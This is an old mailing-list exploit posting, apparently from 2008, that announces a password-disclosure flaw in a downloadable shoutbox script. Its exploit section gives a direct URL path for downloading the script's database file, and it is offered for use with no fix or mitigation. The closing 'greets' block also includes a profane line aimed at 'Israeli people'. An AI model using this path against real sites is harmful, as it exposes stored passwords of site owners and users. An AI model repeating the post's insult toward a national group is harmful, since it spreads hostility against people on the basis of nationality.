
Date: Sat, 27 Sep 2008 18:11:12 +0300
From: Ghost hacker <ghost-r00t@...mail.com>
To: ستروك <submit@...w0rm.com>,
	السيكروتي فوكس <bugtraq@...urityfocus.com>
Subject: shoutbox Remote Password Disclouse Vulnerability


####################################################################################################
# shoutbox Remote Password Disclouse Vulnerability                                                 #
# Ghost Hacker , Real Hack Back                                                                    #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] My Home : http://Real-h.com  [ Real Hack Back ]                                               #
#[~] Contact Me : Ghost-r00t@...mail.com                                                           #
#[~] Bug : Remote Password Disclouse                                                               #
#[~] From : Kingdom Saudi Arabia                                                                   #
#[~] Name Script : shoutbox                                                                        #
#[~] Download : http://www.designplace.org/download.php?file=shoutbox.zip                          #
####################################################################################################
#[~] Exploit :                                                                                     #
# http://xxxx.com/[path]/db/shoutdb.mdb                                                            #
####################################################################################################
#[~]Greets :                                                                                       #
# Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , L&J TeaM      #
# HitleR 07 , D3is Hacker , RoMaNcYxHaCkEr , Mr.PaTcH , Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr     #
# All Members Real Hack and Members Arab Security , All My Friends !                               #
####################################################################################################
#[~]Fuck :                                                                                         #
# All kidz Hackers , All my Traitors , Israeli people !                                            #
####################################################################################################
# I love the Messenger of Allah Mohammad                                                           #
####################################################################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/